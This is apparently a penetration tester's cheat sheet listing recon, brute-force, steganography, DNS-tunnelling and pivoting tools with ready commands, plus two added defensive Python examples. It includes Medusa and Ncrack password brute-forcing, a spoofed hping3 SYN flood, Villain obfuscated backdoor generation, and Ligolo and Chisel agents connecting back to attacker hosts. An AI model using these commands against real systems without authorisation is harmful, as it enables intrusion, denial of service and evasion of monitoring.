Reference List
MassDNS – A high-performance DNS stub resolver for massive amounts of domains [Link]. In its repository, there is a file with one thousand DNS resolver IPs. See also Subjack: it scans a list of subdomains concurrently and identifies ones that are able to be hijacked [Link].
sudo apt install massdns
massdns -r resolvers.lst -t A -w results.output domains.lst
ShuffleDNS – A tool for brute-forcing and resolving subdomains that handles wildcard subdomains [Link].
GO111MODULE=on go get -v github.com/projectdiscovery/shuffledns/cmd/shuffledns
wget https://raw.githubusercontent.com/blechschmidt/massdns/master/lists/resolvers.txt
~/go/bin/shuffledns -h
Subdomain Bruteforcing:
~/go/bin/shuffledns -d example.com -w wordlist.lst -r resolvers.txt -t 200
To resolve a list of subdomains:
~/go/bin/shuffledns -d example.com -list subdomains.lst -r resolvers.txt
subfinder -d example.com -silent | ~/go/bin/shuffledns -d example.com -r resolvers.txt
DNSProbe – Performs multiple DNS queries (A, AAAA, CNAME, TXT, MX) with a list of resolvers [Link].
GO111MODULE=on go get -v github.com/projectdiscovery/dnsprobe
subfinder -d example.com -silent | ~/go/bin/dnsprobe -r cname
subfinder -d example.com -silent | ~/go/bin/dnsprobe -r txt
subfinder -d example.com -silent | ~/go/bin/dnsprobe -r mx
subfinder -d example.com -silent | ~/go/bin/dnsprobe -r a
subfinder -d example.com -silent | ~/go/bin/dnsprobe -r aaaa -silent
Amass – The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques [Link].
FEATURES
- DNS: Brute-forcing, rDNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations/permutations, FQDN Similarity-based Guessing.
- Scraping: Ask, Baidu, Bing, BuiltWith, DNSDumpster, HackerOne, IPv4Info, RapidDNS, Riddler, SiteDossier, Yahoo.
- Certificates: Active pulls (optional), Censys, CertSpotter, Crtsh, FacebookCT, GoogleCT.
- APIs: AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML, ZETAlytics, ZoomEye.
- Web Archives: ArchiveIt, ArchiveToday, Wayback.
sudo apt install amass
amass enum -d example.com
amass enum -passive -d example.com -src
Jok3r – A framework that aids penetration testers in network infrastructure and web security assessments [Link]. It automatically does all the basic work with just a few prompts. Great as a starting point and for finding obvious vulnerabilities.
Installing and executing:
sudo docker pull koutto/jok3r
sudo docker run -i -t --name jok3r-container -w /root/jok3r -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3r
The final image will be 16.4 GB in size 🙁
Re-starting or getting a shell:
sudo docker start -i jok3r-container
sudo docker exec -it jok3r-container bash
- ./jok3r.py info --checks http
- ./jok3r.py attack -t https://example.com/ --add2db default
- ./jok3r.py attack -t https://example.com/ --add2db default --fast
- ./jok3r.py db
  - mission -h
  - hosts
  - services
  - products
  - vulns
  - vulns --no-truncation
  - creds
  - report
To copy the reports to the host machine:
sudo docker cp jok3r-container:/root/jok3r/reports/ .
Medusa – A parallel, modular login brute-forcer that supports many network services [Link].
medusa -d
medusa -h 192.168.0.1 -u root -P passwords.txt -e ns -M smbnt
medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
medusa -M smbnt -C combo.txt
medusa -M smbnt -C combo.txt -H hosts.txt
- -d: list available modules
- -q: display module usage info
- -M: module (mode)
- -h: hostname or IP
- -H: list of hosts
- -u: username
- -U: list of users
- -p: password
- -P: list of passwords
- -C: combo file of entries
- -e: additional password checks, n for no password and s for password = username
- -T: total number of hosts to test concurrently
- -t: total number of logins to test concurrently
Ncrack – Ncrack is a high-speed network authentication cracking tool developed by the nmap team [Link]. The supported protocols include SSH, RDP, FTP, Telnet, HTTP(S), POP3(S), IMAP, SMB, VNC, SIP, Redis, PostgreSQL, MySQL, MSSQL, MongoDB, Cassandra, WinRM, and OWA.
ncrack --user root -p ssh -P passwords.txt 10.10.10.10
ncrack -u root -p 22 -P passwords.txt -T5 10.10.10.10
ncrack -u root -p 21 -P passwords.txt -T 5 10.10.10.10
ncrack -u root -p 21 -P passwords.txt 10.10.10.10
ncrack -u root -p 3389 -P passwords.txt 10.10.10.10
SubBrute – Brute force app to discover subdomains [Link].
./subbrute.py example.com
./subbrute.py onedomain.com anotherdomain.com
./subbrute.py example.com > output.txt
./subbrute.py -t domainslist.txt
Steghide – A steganography tool that hides data in some of the least significant bits of pictures (.jpg, .bmp) or audio (.wav, .au) files [Link].
sudo apt install steghide steghide-doc -y
steghide info fileName
steghide embed -cf image.jpg -ef secret.txt -v
steghide extract -sf image.jpg
steghide embed -cf audio.wav -ef secret.txt -p password
steghide --encinfo
steghide embed -cf image.bmp -ef secret.txt -e des
StegCracker – Steganography brute-force utility to uncover hidden data inside files [Link].
pip3 install stegcracker
stegcracker fileName /path/wordlist.txt
Zsteg – A tool that can detect hidden data in .png and .bmp files. [Link].
gem install zsteg
zsteg fileName
zsteg -a fileName
zsteg -E "b8,rgb,lsb,xy" fileName > extracted.exe
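The Steghide and Zsteg entries above both rest on the same mechanism: a payload lives in the least significant bit of each carrier byte, so the carrier changes by at most one unit per byte and only a reader that knows the bit order gets it back. The following is an added example, not code from either tool: a simplified sequential 1-bit LSB embed/extract over a constructed byte buffer standing in for raw pixel or sample bytes (real tools choose the carrier positions differently; steghide derives them from the passphrase).

```python
# Added example (not steghide's or zsteg's own code): minimal 1-bit LSB
# embedding over a constructed buffer that stands in for raw pixel/sample bytes,
# to show why the cover looks unchanged and how a fixed read order recovers it.

def embed_lsb(cover: bytes, payload: bytes) -> bytes:
    """Write payload bits into the LSB of successive cover bytes (one bit per
    byte), prefixed with a 32-bit big-endian length so extraction knows where
    to stop. Raises if the cover has too few bytes."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(b >> i) & 1 for b in data for i in range(7, -1, -1)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for payload")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # clear the LSB, then set it
    return bytes(out)


def _read_lsb_bytes(stego: bytes, offset_bits: int, n_bytes: int) -> bytes:
    """Rebuild n_bytes from the LSB plane starting at a bit offset."""
    out = bytearray()
    for k in range(n_bytes):
        byte = 0
        for i in range(8):
            byte = (byte << 1) | (stego[offset_bits + k * 8 + i] & 1)
        out.append(byte)
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Read the length prefix, then exactly that many payload bytes."""
    length = int.from_bytes(_read_lsb_bytes(stego, 0, 4), "big")
    return _read_lsb_bytes(stego, 32, length)


def max_byte_change(cover: bytes, stego: bytes) -> int:
    """Largest per-byte difference; 1-bit LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed cover: 256 bytes with a deterministic pattern, not a real image.
COVER = bytes((i * 37) % 256 for i in range(256))
PAYLOAD = b"hidden note"

if __name__ == "__main__":
    stego = embed_lsb(COVER, PAYLOAD)
    print(extract_lsb(stego), max_byte_change(COVER, stego))
```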
Exiv2 – A command-line utility to read, write, delete and modify Exif, IPTC, XMP, and ICC image metadata [Link]. Official website [Link].
sudo apt install exiv2 -y
exiv2 fileName
Binwalk – A tool for analyzing, reverse engineering, and extracting firmware images [Link].
sudo apt install binwalk -y
binwalk fileName
binwalk -e fileName
oleVBA – A script to parse OLE and OpenXML files such as MS Office documents, to extract VBA Macro code [Link].
olevba3 fileName.doc
olevba3 fileName.xls
After extracting the VBA code from a document, you can use a web tool such as OnlineGDB [Link] to compile and run the code safely.
MACchanger – A utility that makes manipulating the MAC addresses of network interfaces easier [Link].
sudo apt install macchanger -y
macchanger -h
macchanger -s eth0
sudo ifconfig eth0 down
sudo macchanger -r eth0
sudo ifconfig eth0 up
macchanger -s eth0
Spoof a known MAC address vendor:
macchanger -l
macchanger -m 00:00:17:22:22:22 eth0
Alternatively:
sudo ifconfig eth0 down
sudo ifconfig eth0 hw ether 00:00:17:22:22:22
sudo ifconfig eth0 up
ifconfig -a
DNScat2 – Designed to create an encrypted client-server channel over the DNS protocol (DNS tunneling) [Link] [Link]. It supports multiple TCP tunnels, for SSH and HTTP for example. It is a good fit for C2 of malware and botnets, but it requires a lot of workarounds to work properly. I recommend and prefer Iodine instead.
sudo apt install dnscat2 -y
OR
sudo apt install dnscat2-server -y
sudo apt install dnscat2-client -y
Client
dnscat -h
dnscat domain.com
dnscat --dns domain=domain.com
dnscat --dns domain=domain.com,server=8.8.8.8,port=53
dnscat --dns domain=domain.com,port=53 --no-cache
dnscat --dns domain=domain.com,port=8053,type=A,CNAME
Using an established session:
session -i 12345
help
exec -h
shell
Server
dnscat2-server -h
dnscat2-server
dnscat2-server domain.com
dnscat2-server domain1.com domain2.net
dnscat2-server --dns 'host=127.0.0.1,port=53,domain=domain1.com,domain=domain2.com'
Iodine – Tunnels IPv4 traffic (TCP/UDP/ICMP) through DNS by creating a logical network interface on the clients and connecting them (up to 16) as a private network [Link] [Link]. It is a high-performance and very flexible piece of software for DNS tunneling but does not offer encryption. It can also be used with a VPN.
sudo apt install iodine -y
iodine -h
Server
Configure your domain with the following entries:
iodine IN NS iodine-ns.domain.com.
iodine-ns IN A 200.200.200.200
OR
iodine IN NS subdomain.duckdns.org.
Configure the server to route traffic from the Iodine network to the network interface that has internet access (in my case enp0s3):
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o enp0s3 -j MASQUERADE
sudo iptables -t filter -A FORWARD -i enp0s3 -o dns0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -t filter -A FORWARD -i dns0 -o enp0s3 -j ACCEPT
Then start the service:
sudo iodined -f -P password 10.0.0.1 iodine.domain.com
If you do not specify a password on the command line, the application will prompt you for one.
The argument -f keeps it running in the foreground to allow troubleshooting during testing.
Note that a new network interface named dns0 will be created.
Client
sudo iodine -f -P password iodine.domain.com
This setup uses the DNS server already configured on the client's network as the route for the packets. It is the way to go when the network only allows DNS traffic (port 53) to the local trusted DNS server. This is how a captive portal can be bypassed.
For direct access to the Iodine server, change /etc/resolv.conf accordingly:
nameserver 200.200.200.200
Then you can route all your traffic through the Iodine network interface (dns0):
sudo route add -net 0.0.0.0/0 gw 10.0.0.1 dns0
OR
sudo ip route add default via 10.0.0.1 dev dns0
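From the defender's side, the DNScat2 and Iodine setups above share one observable: the data travels inside the labels of names under a zone the operator delegated (iodine.domain.com in this list), so a single client emits many distinct, long, high-entropy names there, often with record types a browser never asks for. The following is an added example, not code from either tool, that scores constructed DNS query log lines on exactly those features; the log format, the three-label zone assumption and the thresholds are assumptions chosen for the demonstration.

```python
# Added example, not code from dnscat2 or Iodine: flag tunnel-like DNS traffic in
# constructed query logs. Both tools carry data in the labels of names under a
# zone they control (e.g. iodine.domain.com above), so one client sends many
# distinct, long, high-entropy names there, often with uncommon record types.
import base64, hashlib, math
from collections import Counter, defaultdict

UNUSUAL_TYPES = {"NULL", "TXT", "CNAME", "MX", "SRV"}

def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values())

def find_tunnel_candidates(lines, min_names=5, min_len=24, min_entropy=3.5):
    """lines: 'client qname qtype' (constructed format, one query per line).
    Assumes the tunnel zone is a 3-label delegated name such as
    iodine.domain.com; everything left of it is treated as encoded data."""
    groups = defaultdict(lambda: {"names": set(), "lens": [], "ents": [], "odd": 0})
    for line in lines:
        client, qname, qtype = line.split()
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 4:
            continue  # no data labels in front of a 3-label zone
        zone, data = ".".join(labels[-3:]), ".".join(labels[:-3])
        g = groups[(client, zone)]
        g["names"].add(qname)
        g["lens"].append(len(data))
        g["ents"].append(entropy(data))
        g["odd"] += qtype.upper() in UNUSUAL_TYPES
    hits = []
    for (client, zone), g in groups.items():
        n, q = len(g["names"]), len(g["lens"])
        if (n >= min_names and sum(g["lens"]) / q >= min_len
                and sum(g["ents"]) / q >= min_entropy):
            hits.append({"client": client, "zone": zone,
                         "distinct_names": n, "unusual_types": g["odd"]})
    return hits

def constructed_log():
    """Three ordinary lookups plus eight tunnel-style queries (all constructed)."""
    benign = ["10.0.0.5 www.example.com A", "10.0.0.5 mail.example.com MX",
              "10.0.0.5 cdn.assets.example.com A"]
    tunnel = []
    for i in range(8):  # deterministic stand-in for encoded tunnel chunks
        chunk = base64.b32encode(hashlib.sha256(b"chunk%d" % i).digest())
        chunk = chunk.decode().lower().rstrip("=")
        tunnel.append(f"10.0.0.9 {chunk[:26]}.{chunk[26:]}.iodine.domain.com NULL")
    return benign + tunnel
```

On a real resolver log the zone grouping should use the delegation point (the NS record in the zone file above) rather than a fixed label count, and the thresholds need tuning against the site's own CDN and anti-virus lookup patterns, which also produce long labels.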
hping3 – A command-line oriented packet assembler and analyzer. It supports TCP, UDP, ICMP, and RAW-IP protocols. This tool can be used for firewall and network testing, port scanning, fingerprinting, auditing, DoS/DDoS attacks, etc. Available at [Link] and [Link].
sudo apt install hping3 -y
hping3 --help
sudo hping3 -S 10.1.1.1
sudo hping3 -S 10.1.1.1 -p 8080
sudo hping3 -S 10.1.1.1 -p 8080 -c 10
sudo hping3 --scan 80-90,400-500 -A 10.1.1.1
sudo hping3 -1 10.1.1.x --rand-dest -I eth0
sudo hping3 -9 10.1.1.10 -V
sudo hping3 -S 10.1.1.1 -a 192.168.1.1 -p 443 --flood -I tun0
Modes
- default mode: TCP mode.
- -0 --rawip: RAW IP mode.
- -1 --icmp: ICMP mode.
- -2 --udp: UDP mode.
- -8 --scan: SCAN mode.
- -9 --listen: listening mode.
WhatWeb – It is a web scanner that identifies the technology stack that powers a website, such as web service, framework, language, etc [Link].
whatweb https://example.com
NetDiscover – Active/passive ARP reconnaissance tool [Link].
netdiscover -h
sudo netdiscover -r 192.168.1.0/24
sudo netdiscover -p
sudo netdiscover -i eth0
sudo netdiscover -i eth0 -P -N
Note: use -P and -N if you need to pipe the output into another application; it prints in text format without headers. To be stealthy, scan in passive mode with -p: it only sniffs and does not send any packet that could announce its presence and scanning to an IDS/IPS.
Zmap – Zmap
Zgrab – Zgrab
ZDNS – ZDNS
Villain – A backdoor generator and multi-session handler for Windows and Linux [Link]. It allows collaborative engagements by connecting sibling servers over an encrypted channel to share sessions across the same or multiple network segments.
git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt
sudo python3 Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]
Commands
- help: shows commands and usage information.
- generate os=windows lhost=eth0: generates a payload for Windows that will connect back to the IP of the network interface specified (eth0 for instance).
- generate os=windows lhost=eth0 obfuscate: same as above but with code obfuscation to evade the operating system's defenses.
- sessions: lists active sessions.
- shell 897df98-7a897f0a-98d7f98: connects to a session by Session ID.
- exec ~/script.ps1 897df98-7a897f0a-98d7f98: executes a PowerShell script against a Windows session.
- connect 192.168.111.111: connects to another server instance. It requires approving the connection within 10 seconds.
- siblings: lists the connected sibling servers.
dnsTwist – A fuzzer for finding registered typo-squatting domain candidates [Link].
sudo apt install dnstwist -y
dnstwist -r domain.com
Ligolo-ng – A reverse VPN for pivoting (lateral movement) in a pentest engagement, written in Go [Link]. The attacker machine is actually the server that receives a connection back from an internal network that probably sits behind a NAT. The communication is encrypted with TLS and hard to distinguish from regular web browsing traffic. It creates a tunnel interface in user land and is also compatible with IPv6.
From the attacker machine – Server
go build -o proxy cmd/proxy/main.go
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ufw allow 80,443/tcp
./proxy -autocert -laddr 0.0.0.0:443
sudo ip route add 10.0.0.0/24 dev ligolo
Note: -autocert automatically issues Let's Encrypt certificates for Internet-facing infrastructure, or to appear legitimate on monitored networks. Optionally, -selfcert can be used to skip this requirement; the agent then needs the argument -ignore-cert to skip verification. Optionally a list of accepted domains can be passed with -allow-domains. Port 80 needs to be open to satisfy the Let's Encrypt challenges.
From the victim machine – Client / Agent
go build -o agent cmd/agent/main.go
./agent -connect attacker.com:443
Operating
Once the connection is established, use the following commands on the C2 (server-side) as needed.
>> session
>> ifconfig
>> listener_list
>> start
>> stop
Chisel – A single executable that includes both client and server, written in Go; it tunnels traffic over HTTP, making it stealthy in monitored networks [Link]. It allows multiple simultaneous tunnels and TLS (HTTPS) with certificates automatically issued by Let's Encrypt.
sudo apt install chisel -y
OR
go install github.com/jpillora/chisel@latest
On the attacker side: Server
chisel server -p 80 --reverse
chisel server -p 443 --reverse --tls-domain example.com
On the pivot side: Client
chisel client 200.200.200.200:80 R:socks
chisel client https://200.200.200.200:443 R:0.0.0.0:1080:socks